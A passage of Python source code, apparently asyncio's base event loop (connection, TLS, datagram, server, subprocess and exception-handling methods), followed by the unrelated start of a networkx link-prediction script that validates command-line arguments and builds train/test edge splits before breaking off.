                type=socket.SOCK_STREAM, proto=proto, flags=flags, loop=self)
            if not infos:
                raise OSError('getaddrinfo() returned empty list')
            if local_addr is not None:
                laddr_infos = await self._ensure_resolved(
                    local_addr, family=family,
                    type=socket.SOCK_STREAM, proto=proto,
                    flags=flags, loop=self)
                if not laddr_infos:
                    raise OSError('getaddrinfo() returned empty list')
            else:
                laddr_infos = None
            if interleave:
                infos = _interleave_addrinfos(infos, interleave)
            # Each element of `exceptions` is a per-attempt sub-list
            # appended by _connect_sock().
            exceptions = []
            if happy_eyeballs_delay is None:
                # not using happy eyeballs: try each address sequentially
                # until one connects.
                for addrinfo in infos:
                    try:
                        sock = await self._connect_sock(
                            exceptions, addrinfo, laddr_infos)
                        break
                    except OSError:
                        continue
            else:  # using happy eyeballs
                sock, _, _ = await staggered.staggered_race(
                    (functools.partial(self._connect_sock,
                                       exceptions, addrinfo, laddr_infos)
                     for addrinfo in infos),
                    happy_eyeballs_delay, loop=self)
            if sock is None:
                # Flatten the per-attempt sub-lists before reporting.
                exceptions = [exc for sub in exceptions for exc in sub]
                if len(exceptions) == 1:
                    raise exceptions[0]
                else:
                    # If they all have the same str(), raise one.
                    model = str(exceptions[0])
                    if all(str(exc) == model for exc in exceptions):
                        raise exceptions[0]
                    # Raise a combined exception so the user can see all
                    # the various error messages.
                    raise OSError('Multiple exceptions: {}'.format(
                        ', '.join(str(exc) for exc in exceptions)))
        else:
            if sock is None:
                raise ValueError(
                    'host and port was not specified and no sock specified')
            if sock.type != socket.SOCK_STREAM:
                # We allow AF_INET, AF_INET6, AF_UNIX as long as they
                # are SOCK_STREAM.
                # We support passing AF_UNIX sockets even though we have
                # a dedicated API for that: create_unix_connection.
                # Disallowing AF_UNIX in this method, breaks backwards
                # compatibility.
                raise ValueError(
                    f'A Stream Socket was expected, got {sock!r}')
        transport, protocol = await self._create_connection_transport(
            sock, protocol_factory, ssl, server_hostname,
            ssl_handshake_timeout=ssl_handshake_timeout)
        if self._debug:
            # Get the socket from the transport because SSL transport closes
            # the old socket and creates a new SSL socket
            sock = transport.get_extra_info('socket')
            logger.debug("%r connected to %s:%r: (%r, %r)",
                         sock, host, port, transport, protocol)
        return transport, protocol
async def _create_connection_transport(
            self, sock, protocol_factory, ssl,
            server_hostname, server_side=False,
            ssl_handshake_timeout=None):
        """Build a (transport, protocol) pair over a connected socket.
        Waits on *waiter* (completed by the transport's connection_made
        machinery) before returning; on failure the transport is closed.
        """
        sock.setblocking(False)
        protocol = protocol_factory()
        waiter = self.create_future()
        if ssl:
            # ssl=True means "use a default context"; any other truthy
            # value is taken to be the SSLContext itself.
            sslcontext = None if isinstance(ssl, bool) else ssl
            transport = self._make_ssl_transport(
                sock, protocol, sslcontext, waiter,
                server_side=server_side, server_hostname=server_hostname,
                ssl_handshake_timeout=ssl_handshake_timeout)
        else:
            transport = self._make_socket_transport(sock, protocol, waiter)
        try:
            await waiter
        except:
            # Setup failed (or was cancelled): tear the transport down.
            transport.close()
            raise
        return transport, protocol
async def sendfile(self, transport, file, offset=0, count=None,
                       *, fallback=True):
        """Send a file to transport.
        Return the total number of bytes which were sent.
        The method uses high-performance os.sendfile if available.
        file must be a regular file object opened in binary mode.
        offset tells from where to start reading the file. If specified,
        count is the total number of bytes to transmit as opposed to
        sending the file until EOF is reached. File position is updated on
        return or also in case of error in which case file.tell()
        can be used to figure out the number of bytes
        which were sent.
        fallback set to True makes asyncio to manually read and send
        the file when the platform does not support the sendfile syscall
        (e.g. Windows or SSL socket on Unix).
        Raise SendfileNotAvailableError if the system does not support
        sendfile syscall and fallback is False.
        """
        if transport.is_closing():
            raise RuntimeError("Transport is closing")
        # The transport advertises its sendfile capability via the
        # _sendfile_compatible marker attribute.
        mode = getattr(transport, '_sendfile_compatible',
                       constants._SendfileMode.UNSUPPORTED)
        if mode is constants._SendfileMode.UNSUPPORTED:
            raise RuntimeError(
                f"sendfile is not supported for transport {transport!r}")
        if mode is constants._SendfileMode.TRY_NATIVE:
            try:
                return await self._sendfile_native(transport, file,
                                                   offset, count)
            except exceptions.SendfileNotAvailableError as exc:
                # Native path unavailable; fall through to the userspace
                # fallback below (unless fallback is disabled).
                if not fallback:
                    raise
        # mode is FALLBACK, or the native attempt above failed.
        if not fallback:
            raise RuntimeError(
                f"fallback is disabled and native sendfile is not "
                f"supported for transport {transport!r}")
        return await self._sendfile_fallback(transport, file,
                                             offset, count)
async def _sendfile_native(self, transp, file, offset, count):
        """Stub: overridden by event loops that support os.sendfile()."""
        message = "sendfile syscall is not supported"
        raise exceptions.SendfileNotAvailableError(message)
async def _sendfile_fallback(self, transp, file, offset, count):
        """Transport-level sendfile emulation (no native syscall).
        Temporarily swaps in _SendfileFallbackProtocol to drive flow
        control, then pumps the file through transp.write() in 16 KiB
        chunks. The original protocol is restored in the finally block.
        """
        if offset:
            file.seek(offset)
        blocksize = min(count, 16384) if count else 16384
        buf = bytearray(blocksize)
        total_sent = 0
        proto = _SendfileFallbackProtocol(transp)
        try:
            while True:
                if count:
                    # Shrink the last chunk to the remaining byte budget.
                    blocksize = min(count - total_sent, blocksize)
                    if blocksize <= 0:
                        return total_sent
                view = memoryview(buf)[:blocksize]
                read = await self.run_in_executor(None, file.readinto, view)
                if not read:
                    return total_sent  # EOF
                # Respect the transport's flow control before writing more.
                await proto.drain()
                transp.write(view[:read])
                total_sent += read
        finally:
            # Leave file position at the point reached, then reinstall the
            # caller's protocol on the transport.
            if total_sent > 0 and hasattr(file, 'seek'):
                file.seek(offset + total_sent)
            await proto.restore()
async def start_tls(self, transport, protocol, sslcontext, *,
                        server_side=False,
                        server_hostname=None,
                        ssl_handshake_timeout=None):
        """Upgrade transport to TLS.
        Return a new transport that *protocol* should start using
        immediately.
        """
        if ssl is None:
            raise RuntimeError('Python ssl module is not available')
        if not isinstance(sslcontext, ssl.SSLContext):
            raise TypeError(
                f'sslcontext is expected to be an instance of ssl.SSLContext, '
                f'got {sslcontext!r}')
        if not getattr(transport, '_start_tls_compatible', False):
            raise TypeError(
                f'transport {transport!r} is not supported by start_tls()')
        waiter = self.create_future()
        ssl_protocol = sslproto.SSLProtocol(
            self, protocol, sslcontext, waiter,
            server_side, server_hostname,
            ssl_handshake_timeout=ssl_handshake_timeout,
            call_connection_made=False)
        # Pause early so that "ssl_protocol.data_received()" doesn't
        # have a chance to get called before "ssl_protocol.connection_made()".
        transport.pause_reading()
        transport.set_protocol(ssl_protocol)
        # Scheduling order matters: connection_made must run before reading
        # resumes; both are cancelled if the handshake fails below.
        conmade_cb = self.call_soon(ssl_protocol.connection_made, transport)
        resume_cb = self.call_soon(transport.resume_reading)
        try:
            await waiter
        except BaseException:
            transport.close()
            conmade_cb.cancel()
            resume_cb.cancel()
            raise
        return ssl_protocol._app_transport
async def create_datagram_endpoint(self, protocol_factory,
                                       local_addr=None, remote_addr=None, *,
                                       family=0, proto=0, flags=0,
                                       reuse_address=_unset, reuse_port=None,
                                       allow_broadcast=None, sock=None):
        """Create datagram connection.
        Returns a (transport, protocol) pair. Either pass a pre-made UDP
        *sock*, or local/remote addresses to be resolved and bound/connected
        here; the two styles are mutually exclusive.
        """
        if sock is not None:
            if sock.type != socket.SOCK_DGRAM:
                raise ValueError(
                    f'A UDP Socket was expected, got {sock!r}')
            # A pre-made socket excludes all socket-configuration kwargs.
            if (local_addr or remote_addr or
                    family or proto or flags or
                    reuse_port or allow_broadcast):
                # show the problematic kwargs in exception msg
                opts = dict(local_addr=local_addr, remote_addr=remote_addr,
                            family=family, proto=proto, flags=flags,
                            reuse_address=reuse_address, reuse_port=reuse_port,
                            allow_broadcast=allow_broadcast)
                problems = ', '.join(f'{k}={v}' for k, v in opts.items() if v)
                raise ValueError(
                    f'socket modifier keyword arguments can not be used '
                    f'when sock is specified. ({problems})')
            sock.setblocking(False)
            r_addr = None
        else:
            if not (local_addr or remote_addr):
                if family == 0:
                    raise ValueError('unexpected address family')
                addr_pairs_info = (((family, proto), (None, None)),)
            elif hasattr(socket, 'AF_UNIX') and family == socket.AF_UNIX:
                for addr in (local_addr, remote_addr):
                    if addr is not None and not isinstance(addr, str):
                        raise TypeError('string is expected')
                # Remove a stale filesystem socket before binding (abstract
                # namespace addresses start with NUL and are skipped).
                if local_addr and local_addr[0] not in (0, '\x00'):
                    try:
                        if stat.S_ISSOCK(os.stat(local_addr).st_mode):
                            os.remove(local_addr)
                    except FileNotFoundError:
                        pass
                    except OSError as err:
                        # Directory may have permissions only to create socket.
                        logger.error('Unable to check or remove stale UNIX '
                                     'socket %r: %r',
                                     local_addr, err)
                addr_pairs_info = (((family, proto),
                                    (local_addr, remote_addr)), )
            else:
                # join address by (family, protocol)
                addr_infos = {}  # Using order preserving dict
                for idx, addr in ((0, local_addr), (1, remote_addr)):
                    if addr is not None:
                        assert isinstance(addr, tuple) and len(addr) == 2, (
                            '2-tuple is expected')
                        infos = await self._ensure_resolved(
                            addr, family=family, type=socket.SOCK_DGRAM,
                            proto=proto, flags=flags, loop=self)
                        if not infos:
                            raise OSError('getaddrinfo() returned empty list')
                        for fam, _, pro, _, address in infos:
                            key = (fam, pro)
                            if key not in addr_infos:
                                addr_infos[key] = [None, None]
                            addr_infos[key][idx] = address
                # each addr has to have info for each (family, proto) pair
                addr_pairs_info = [
                    (key, addr_pair) for key, addr_pair in addr_infos.items()
                    if not ((local_addr and addr_pair[0] is None) or
                            (remote_addr and addr_pair[1] is None))]
                if not addr_pairs_info:
                    raise ValueError('can not get address information')
            exceptions = []
            # bpo-37228: reuse_address is deprecated/forbidden for UDP
            # because SO_REUSEADDR on UDP allows socket hijacking.
            if reuse_address is not _unset:
                if reuse_address:
                    raise ValueError("Passing `reuse_address=True` is no "
                                     "longer supported, as the usage of "
                                     "SO_REUSEPORT in UDP poses a significant "
                                     "security concern.")
                else:
                    warnings.warn("The *reuse_address* parameter has been "
                                  "deprecated as of 3.5.10 and is scheduled "
                                  "for removal in 3.11.", DeprecationWarning,
                                  stacklevel=2)
            # Try each (family, proto) candidate; the for/else raises the
            # first failure only when no candidate succeeded.
            for ((family, proto),
                 (local_address, remote_address)) in addr_pairs_info:
                sock = None
                r_addr = None
                try:
                    sock = socket.socket(
                        family=family, type=socket.SOCK_DGRAM, proto=proto)
                    if reuse_port:
                        _set_reuseport(sock)
                    if allow_broadcast:
                        sock.setsockopt(
                            socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
                    sock.setblocking(False)
                    if local_addr:
                        sock.bind(local_address)
                    if remote_addr:
                        if not allow_broadcast:
                            await self.sock_connect(sock, remote_address)
                        r_addr = remote_address
                except OSError as exc:
                    if sock is not None:
                        sock.close()
                    exceptions.append(exc)
                except:
                    if sock is not None:
                        sock.close()
                    raise
                else:
                    break
            else:
                raise exceptions[0]
        protocol = protocol_factory()
        waiter = self.create_future()
        transport = self._make_datagram_transport(
            sock, protocol, r_addr, waiter)
        if self._debug:
            if local_addr:
                logger.info("Datagram endpoint local_addr=%r remote_addr=%r "
                            "created: (%r, %r)",
                            local_addr, remote_addr, transport, protocol)
            else:
                logger.debug("Datagram endpoint remote_addr=%r created: "
                             "(%r, %r)",
                             remote_addr, transport, protocol)
        try:
            await waiter
        except:
            # connection_made failed: dispose of the transport.
            transport.close()
            raise
        return transport, protocol
async def _ensure_resolved(self, address, *,
                               family=0, type=socket.SOCK_STREAM,
                               proto=0, flags=0, loop):
        """Return addrinfo tuples for *address*, resolving only if needed.
        When the host part is already a numeric IP literal, _ipaddr_info()
        builds the tuple locally and no getaddrinfo() round-trip happens.
        """
        host, port = address[:2]
        info = _ipaddr_info(host, port, family, type, proto, *address[2:])
        if info is not None:
            # "host" was already a resolved IP address.
            return [info]
        return await loop.getaddrinfo(host, port, family=family, type=type,
                                      proto=proto, flags=flags)
async def _create_server_getaddrinfo(self, host, port, family, flags):
        """Resolve a listen address, failing loudly on an empty result."""
        results = await self._ensure_resolved((host, port), family=family,
                                              type=socket.SOCK_STREAM,
                                              flags=flags, loop=self)
        if results:
            return results
        raise OSError(f'getaddrinfo({host!r}) returned empty list')
async def create_server(
            self, protocol_factory, host=None, port=None,
            *,
            family=socket.AF_UNSPEC,
            flags=socket.AI_PASSIVE,
            sock=None,
            backlog=100,
            ssl=None,
            reuse_address=None,
            reuse_port=None,
            ssl_handshake_timeout=None,
            start_serving=True):
        """Create a TCP server.
        The host parameter can be a string, in that case the TCP server is
        bound to host and port.
        The host parameter can also be a sequence of strings and in that case
        the TCP server is bound to all hosts of the sequence. If a host
        appears multiple times (possibly indirectly e.g. when hostnames
        resolve to the same IP address), the server is only bound once to that
        host.
        Return a Server object which can be used to stop the service.
        This method is a coroutine.
        """
        if isinstance(ssl, bool):
            raise TypeError('ssl argument must be an SSLContext or None')
        if ssl_handshake_timeout is not None and ssl is None:
            raise ValueError(
                'ssl_handshake_timeout is only meaningful with ssl')
        if host is not None or port is not None:
            if sock is not None:
                raise ValueError(
                    'host/port and sock can not be specified at the same time')
            # SO_REUSEADDR is safe for listening TCP sockets on POSIX
            # (but not on Windows/cygwin, where it has different semantics).
            if reuse_address is None:
                reuse_address = os.name == 'posix' and sys.platform != 'cygwin'
            sockets = []
            # Normalize `host` into a list: '' -> wildcard, a single string
            # or non-iterable -> one-element list, otherwise use as-is.
            if host == '':
                hosts = [None]
            elif (isinstance(host, str) or
                  not isinstance(host, collections.abc.Iterable)):
                hosts = [host]
            else:
                hosts = host
            fs = [self._create_server_getaddrinfo(host, port, family=family,
                                                  flags=flags)
                  for host in hosts]
            infos = await tasks.gather(*fs, loop=self)
            # De-duplicate: different hostnames may resolve to the same addr.
            infos = set(itertools.chain.from_iterable(infos))
            completed = False
            try:
                for res in infos:
                    af, socktype, proto, canonname, sa = res
                    try:
                        sock = socket.socket(af, socktype, proto)
                    except socket.error:
                        # Assume it's a bad family/type/protocol combination.
                        if self._debug:
                            logger.warning('create_server() failed to create '
                                           'socket.socket(%r, %r, %r)',
                                           af, socktype, proto, exc_info=True)
                        continue
                    sockets.append(sock)
                    if reuse_address:
                        sock.setsockopt(
                            socket.SOL_SOCKET, socket.SO_REUSEADDR, True)
                    if reuse_port:
                        _set_reuseport(sock)
                    # Disable IPv4/IPv6 dual stack support (enabled by
                    # default on Linux) which makes a single socket
                    # listen on both address families.
                    if (_HAS_IPv6 and
                            af == socket.AF_INET6 and
                            hasattr(socket, 'IPPROTO_IPV6')):
                        sock.setsockopt(socket.IPPROTO_IPV6,
                                        socket.IPV6_V6ONLY,
                                        True)
                    try:
                        sock.bind(sa)
                    except OSError as err:
                        raise OSError(err.errno, 'error while attempting '
                                      'to bind on address %r: %s'
                                      % (sa, err.strerror.lower())) from None
                completed = True
            finally:
                # Any failure above closes every socket created so far.
                if not completed:
                    for sock in sockets:
                        sock.close()
        else:
            if sock is None:
                raise ValueError('Neither host/port nor sock were specified')
            if sock.type != socket.SOCK_STREAM:
                raise ValueError(f'A Stream Socket was expected, got {sock!r}')
            sockets = [sock]
        for sock in sockets:
            sock.setblocking(False)
        server = Server(self, sockets, protocol_factory,
                        ssl, backlog, ssl_handshake_timeout)
        if start_serving:
            server._start_serving()
            # Skip one loop iteration so that all 'loop.add_reader'
            # go through.
            await tasks.sleep(0, loop=self)
        if self._debug:
            logger.info("%r is serving", server)
        return server
async def connect_accepted_socket(
            self, protocol_factory, sock,
            *, ssl=None,
            ssl_handshake_timeout=None):
        """Wrap an already-accepted socket in a (transport, protocol) pair."""
        if sock.type != socket.SOCK_STREAM:
            raise ValueError(f'A Stream Socket was expected, got {sock!r}')
        if ssl_handshake_timeout is not None and not ssl:
            raise ValueError(
                'ssl_handshake_timeout is only meaningful with ssl')
        tr, proto = await self._create_connection_transport(
            sock, protocol_factory, ssl, '', server_side=True,
            ssl_handshake_timeout=ssl_handshake_timeout)
        if self._debug:
            # An SSL transport replaces the raw socket, so fetch the
            # current one back from the transport for logging.
            sock = tr.get_extra_info('socket')
            logger.debug("%r handled: (%r, %r)", sock, tr, proto)
        return tr, proto
async def connect_read_pipe(self, protocol_factory, pipe):
        """Hook *pipe* up for reading; return (transport, protocol)."""
        proto = protocol_factory()
        ready = self.create_future()
        tr = self._make_read_pipe_transport(pipe, proto, ready)
        try:
            await ready
        except BaseException:
            tr.close()
            raise
        if self._debug:
            logger.debug('Read pipe %r connected: (%r, %r)',
                         pipe.fileno(), tr, proto)
        return tr, proto
async def connect_write_pipe(self, protocol_factory, pipe):
        """Hook *pipe* up for writing; return (transport, protocol)."""
        proto = protocol_factory()
        ready = self.create_future()
        tr = self._make_write_pipe_transport(pipe, proto, ready)
        try:
            await ready
        except BaseException:
            tr.close()
            raise
        if self._debug:
            logger.debug('Write pipe %r connected: (%r, %r)',
                         pipe.fileno(), tr, proto)
        return tr, proto
def _log_subprocess(self, msg, stdin, stdout, stderr):
        """Emit a one-line debug summary of a subprocess's stdio wiring."""
        parts = [msg]
        if stdin is not None:
            parts.append(f'stdin={_format_pipe(stdin)}')
        # stderr == subprocess.STDOUT means both streams share one pipe.
        if stdout is not None and stderr == subprocess.STDOUT:
            parts.append(f'stdout=stderr={_format_pipe(stdout)}')
        else:
            if stdout is not None:
                parts.append(f'stdout={_format_pipe(stdout)}')
            if stderr is not None:
                parts.append(f'stderr={_format_pipe(stderr)}')
        logger.debug(' '.join(parts))
async def subprocess_shell(self, protocol_factory, cmd, *,
                               stdin=subprocess.PIPE,
                               stdout=subprocess.PIPE,
                               stderr=subprocess.PIPE,
                               universal_newlines=False,
                               shell=True, bufsize=0,
                               encoding=None, errors=None, text=None,
                               **kwargs):
        """Run *cmd* through the shell; return (transport, protocol).
        The text-mode related Popen options are rejected because asyncio
        subprocess pipes are bytes-only; the parameters exist so callers get
        an explicit error rather than silent misbehavior.
        """
        if not isinstance(cmd, (bytes, str)):
            raise ValueError("cmd must be a string")
        if universal_newlines:
            raise ValueError("universal_newlines must be False")
        if not shell:
            raise ValueError("shell must be True")
        if bufsize != 0:
            raise ValueError("bufsize must be 0")
        if text:
            raise ValueError("text must be False")
        if encoding is not None:
            raise ValueError("encoding must be None")
        if errors is not None:
            raise ValueError("errors must be None")
        protocol = protocol_factory()
        debug_log = None
        if self._debug:
            # don't log parameters: they may contain sensitive information
            # (password) and may be too long
            debug_log = 'run shell command %r' % cmd
            self._log_subprocess(debug_log, stdin, stdout, stderr)
        transport = await self._make_subprocess_transport(
            protocol, cmd, True, stdin, stdout, stderr, bufsize, **kwargs)
        if self._debug and debug_log is not None:
            logger.info('%s: %r', debug_log, transport)
        return transport, protocol
async def subprocess_exec(self, protocol_factory, program, *args,
                              stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                              stderr=subprocess.PIPE, universal_newlines=False,
                              shell=False, bufsize=0,
                              encoding=None, errors=None, text=None,
                              **kwargs):
        """Execute *program* directly (no shell); return (transport, protocol).
        Mirrors subprocess_shell() but with shell=False; the same text-mode
        Popen options are rejected because asyncio pipes are bytes-only.
        """
        if universal_newlines:
            raise ValueError("universal_newlines must be False")
        if shell:
            raise ValueError("shell must be False")
        if bufsize != 0:
            raise ValueError("bufsize must be 0")
        if text:
            raise ValueError("text must be False")
        if encoding is not None:
            raise ValueError("encoding must be None")
        if errors is not None:
            raise ValueError("errors must be None")
        popen_args = (program,) + args
        protocol = protocol_factory()
        debug_log = None
        if self._debug:
            # don't log parameters: they may contain sensitive information
            # (password) and may be too long
            debug_log = f'execute program {program!r}'
            self._log_subprocess(debug_log, stdin, stdout, stderr)
        transport = await self._make_subprocess_transport(
            protocol, popen_args, False, stdin, stdout, stderr,
            bufsize, **kwargs)
        if self._debug and debug_log is not None:
            logger.info('%s: %r', debug_log, transport)
        return transport, protocol
def get_exception_handler(self):
        """Return the installed exception handler (None if the default one
        is in use).
        """
        handler = self._exception_handler
        return handler
def set_exception_handler(self, handler):
        """Install *handler* as the loop's exception handler.
        Passing None restores the default handler. A non-None handler must
        be callable with signature ``(loop, context)``; 'loop' is the active
        event loop and 'context' a dict (see `call_exception_handler()` for
        the context keys).
        """
        if handler is None or callable(handler):
            self._exception_handler = handler
            return
        raise TypeError(f'A callable object or None is expected, '
                        f'got {handler!r}')
def default_exception_handler(self, context):
        """Default exception handler.
        This is called when an exception occurs and no exception
        handler is set, and can be called by a custom exception
        handler that wants to defer to the default behavior.
        This default handler logs the error message and other
        context-dependent information. In debug mode, a truncated
        stack trace is also appended showing where the given object
        (e.g. a handle or future or task) was created, if any.
        The context parameter has the same meaning as in
        `call_exception_handler()`.
        """
        message = context.get('message')
        if not message:
            message = 'Unhandled exception in event loop'
        exception = context.get('exception')
        if exception is not None:
            exc_info = (type(exception), exception, exception.__traceback__)
        else:
            exc_info = False
        # If the failing callback left no traceback of its own, attach the
        # creation traceback of the handle currently being executed.
        if ('source_traceback' not in context and
                self._current_handle is not None and
                self._current_handle._source_traceback):
            context['handle_traceback'] = \
                self._current_handle._source_traceback
        log_lines = [message]
        # Render the remaining context entries in a stable (sorted) order;
        # traceback lists are pretty-printed, everything else is repr()'ed.
        for key in sorted(context):
            if key in {'message', 'exception'}:
                continue
            value = context[key]
            if key == 'source_traceback':
                tb = ''.join(traceback.format_list(value))
                value = 'Object created at (most recent call last):\n'
                value += tb.rstrip()
            elif key == 'handle_traceback':
                tb = ''.join(traceback.format_list(value))
                value = 'Handle created at (most recent call last):\n'
                value += tb.rstrip()
            else:
                value = repr(value)
            log_lines.append(f'{key}: {value}')
        logger.error('\n'.join(log_lines), exc_info=exc_info)
def call_exception_handler(self, context):
        """Call the current event loop's exception handler.
        The context argument is a dict containing the following keys:
        - 'message': Error message;
        - 'exception' (optional): Exception object;
        - 'future' (optional): Future instance;
        - 'task' (optional): Task instance;
        - 'handle' (optional): Handle instance;
        - 'protocol' (optional): Protocol instance;
        - 'transport' (optional): Transport instance;
        - 'socket' (optional): Socket instance;
        - 'asyncgen' (optional): Asynchronous generator that caused
          the exception.
        New keys maybe introduced in the future.
        Note: do not overload this method in an event loop subclass.
        For custom exception handling, use the
        `set_exception_handler()` method.
        """
        if self._exception_handler is None:
            try:
                self.default_exception_handler(context)
            except (SystemExit, KeyboardInterrupt):
                raise
            except BaseException:
                # Second protection layer for unexpected errors
                # in the default implementation, as well as for subclassed
                # event loops with overloaded "default_exception_handler".
                logger.error('Exception in default exception handler',
                             exc_info=True)
        else:
            try:
                self._exception_handler(self, context)
            except (SystemExit, KeyboardInterrupt):
                raise
            except BaseException as exc:
                # Exception in the user set custom exception handler.
                try:
                    # Let's try default handler.
                    self.default_exception_handler({
                        'message': 'Unhandled error in exception handler',
                        'exception': exc,
                        'context': context,
                    })
                except (SystemExit, KeyboardInterrupt):
                    raise
                except BaseException:
                    # Guard 'default_exception_handler' in case it is
                    # overloaded.
                    logger.error('Exception in default exception handler '
                                 'while handling an unexpected error '
                                 'in custom exception handler',
                                 exc_info=True)
def _add_callback(self, handle):
        """Queue *handle* on the _ready deque for the next loop pass.
        Despite the historical docstring, TimerHandles are not accepted
        here -- they are pushed on the _scheduled heap elsewhere.
        """
        assert isinstance(handle, events.Handle), 'A Handle is required here'
        # Checked before the TimerHandle assertion so a cancelled timer
        # is silently dropped rather than tripping the assert.
        if handle._cancelled:
            return
        assert not isinstance(handle, events.TimerHandle)
        self._ready.append(handle)
def _add_callback_signalsafe(self, handle):
        """Like _add_callback() but called from a signal handler."""
        self._add_callback(handle)
        # The loop may be blocked in select(); poke the self-pipe so the
        # freshly queued callback is noticed immediately.
        self._write_to_self()
def _timer_handle_cancelled(self, handle):
        """Notification hook: count cancellations of scheduled timers.
        The counter drives the heap-compaction heuristic in _run_once().
        """
        if not handle._scheduled:
            return
        self._timer_cancelled_count += 1
def _run_once(self):
        """Run one full iteration of the event loop.
        This calls all currently ready callbacks, polls for I/O,
        schedules the resulting callbacks, and finally schedules
        'call_later' callbacks.
        """
        # Compact the timer heap when too large a fraction of its entries
        # are cancelled; otherwise just pop cancelled timers off the head.
        sched_count = len(self._scheduled)
        if (sched_count > _MIN_SCHEDULED_TIMER_HANDLES and
            self._timer_cancelled_count / sched_count >
                _MIN_CANCELLED_TIMER_HANDLES_FRACTION):
            # Remove delayed calls that were cancelled if their number
            # is too high
            new_scheduled = []
            for handle in self._scheduled:
                if handle._cancelled:
                    handle._scheduled = False
                else:
                    new_scheduled.append(handle)
            heapq.heapify(new_scheduled)
            self._scheduled = new_scheduled
            self._timer_cancelled_count = 0
        else:
            # Remove delayed calls that were cancelled from head of queue.
            while self._scheduled and self._scheduled[0]._cancelled:
                self._timer_cancelled_count -= 1
                handle = heapq.heappop(self._scheduled)
                handle._scheduled = False
        # Select timeout: 0 when work is pending or the loop is stopping,
        # bounded by the earliest timer otherwise, None (block) when idle.
        timeout = None
        if self._ready or self._stopping:
            timeout = 0
        elif self._scheduled:
            # Compute the desired timeout.
            when = self._scheduled[0]._when
            timeout = min(max(0, when - self.time()), MAXIMUM_SELECT_TIMEOUT)
        event_list = self._selector.select(timeout)
        self._process_events(event_list)
        # Handle 'later' callbacks that are ready.
        # end_time includes the clock resolution so timers due "now" fire.
        end_time = self.time() + self._clock_resolution
        while self._scheduled:
            handle = self._scheduled[0]
            if handle._when >= end_time:
                break
            handle = heapq.heappop(self._scheduled)
            handle._scheduled = False
            self._ready.append(handle)
        # This is the only place where callbacks are actually *called*.
        # All other places just add them to ready.
        # Note: We run all currently scheduled callbacks, but not any
        # callbacks scheduled by callbacks run this time around --
        # they will be run the next time (after another I/O poll).
        # Use an idiom that is thread-safe without using locks.
        ntodo = len(self._ready)
        for i in range(ntodo):
            handle = self._ready.popleft()
            if handle._cancelled:
                continue
            if self._debug:
                try:
                    self._current_handle = handle
                    t0 = self.time()
                    handle._run()
                    dt = self.time() - t0
                    if dt >= self.slow_callback_duration:
                        logger.warning('Executing %s took %.3f seconds',
                                       _format_handle(handle), dt)
                finally:
                    self._current_handle = None
            else:
                handle._run()
        handle = None  # Needed to break cycles when an exception occurs.
def _set_coroutine_origin_tracking(self, enabled):
        """Enable/disable coroutine origin tracking for debug mode.
        Mutates interpreter-global state: the previous tracking depth is
        saved on enable and restored on disable, so toggling is symmetric.
        """
        if bool(enabled) == bool(self._coroutine_origin_tracking_enabled):
            return
        if enabled:
            self._coroutine_origin_tracking_saved_depth = (
                sys.get_coroutine_origin_tracking_depth())
            sys.set_coroutine_origin_tracking_depth(
                constants.DEBUG_STACK_DEPTH)
        else:
            sys.set_coroutine_origin_tracking_depth(
                self._coroutine_origin_tracking_saved_depth)
        self._coroutine_origin_tracking_enabled = enabled
def get_debug(self):
        """Return whether this loop is running in debug mode."""
        debug_enabled = self._debug
        return debug_enabled
def set_debug(self, enabled):
        """Toggle debug mode; sync coroutine origin tracking if running."""
        self._debug = enabled
        if not self.is_running():
            return
        # Must hop through call_soon_threadsafe: this setter may be invoked
        # from another thread while the loop is running.
        self.call_soon_threadsafe(self._set_coroutine_origin_tracking, enabled)
# ---- compute.py ----
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
import networkx as nx
import time
import random
from tqdm import tqdm
import argparse
plt.style.use('ggplot')
import multiprocessing as mp
from sklearn.metrics import roc_curve, roc_auc_score, confusion_matrix
# Command-line interface: dataset path, parallelism and evaluation options.
parser = argparse.ArgumentParser()
parser.add_argument('--dataset', type=str, help='Path of the dataset.')
parser.add_argument('--n_cores', type=int, help='Number of CPU cores to use.')
parser.add_argument('--test_size',type=float, help='Size of the test fold in float')
parser.add_argument('--heur', type=str, choices=['RA','JA','AA','PA'], help='Heuristic to use')
parser.add_argument('--plots', type=str, choices=['YES','NO'], help='Display the plots? Default is just ROC curve')
parser.add_argument('--confusion_mat', type=str, choices=['YES','NO'], help='Whether to compute Confusion Matrix')
parser.add_argument('--thresh_bin', type=float, help='Threshold which binarises the list of scores.')
args = parser.parse_args()
# Validate the command-line arguments before doing any heavy work.
flag = True
# BUG FIX: None (flag omitted) previously raised a TypeError here; negative
# core counts also slipped through and crashed np.array_split later.
if args.n_cores is None or args.n_cores <= 0 or args.n_cores >= mp.cpu_count():
    print('Invalid number of cores.')
    flag = False
# BUG FIX: `0.1 < args.test_size > 0.99` is a chained comparison meaning
# "x > 0.1 AND x > 0.99", so out-of-range values below 0.1 were accepted.
# Reject anything outside [0.1, 0.99] instead.
if args.test_size is None or not 0.1 <= args.test_size <= 0.99:
    print('Invalid proportion of the test fold.')
    flag = False
# Same chained-comparison bug as above; thresh_bin is optional, so only
# validate it when it was actually supplied.
if args.thresh_bin is not None and not 0.1 <= args.thresh_bin <= 0.99:
    print('Invalid value of the binary threshold.')
    flag = False
if not flag:
    exit()
print('\nStarting the algorithm...')
print('Parameters:',' '.join(f'{k}={v}' for k, v in vars(args).items()))
# Load a graph into a NetworkX object.
try:
    Graph = nx.read_gpickle(args.dataset)
    print('Dataset loaded.')
except Exception:
    # BUG FIX: the script previously printed this message and kept going,
    # crashing shortly after with `NameError: Graph`. Stop immediately.
    print('Invalid dataset path. Stopping...')
    exit()
# NOTE(review): t1 is recorded here but never read below -- presumably an
# abandoned timing probe; the timing printed later uses `starttime` instead.
t1 = time.time()
# Fraction of edges you want to remove from the training dataset. Imagine it being like train-test split.
proportion_edges = args.test_size
# Select this fraction of edges from the main graph by sampling from the graph.
edge_subset = random.sample(Graph.edges(), int(proportion_edges * Graph.number_of_edges()))
print('Testing split done.')
train = Graph.copy()
# Remove these edges from the dataset and thus create the training split.
# Nodes are kept, so the node set of `train` matches the full graph.
train.remove_edges_from(edge_subset)
print('Training split done.')
# Candidate links = pairs of nodes with no edge in the training graph.
# nx.non_edges() returns a lazy iterator, so materialize it into a list
# (tqdm shows progress while we consume it).
print('\nComputing the list of non-edges.')
list_of_non_edges = nx.non_edges(train)
non_edges = [(u, v) for u, v in tqdm(list_of_non_edges)]
# Index the held-out test edges by source node so membership checks during
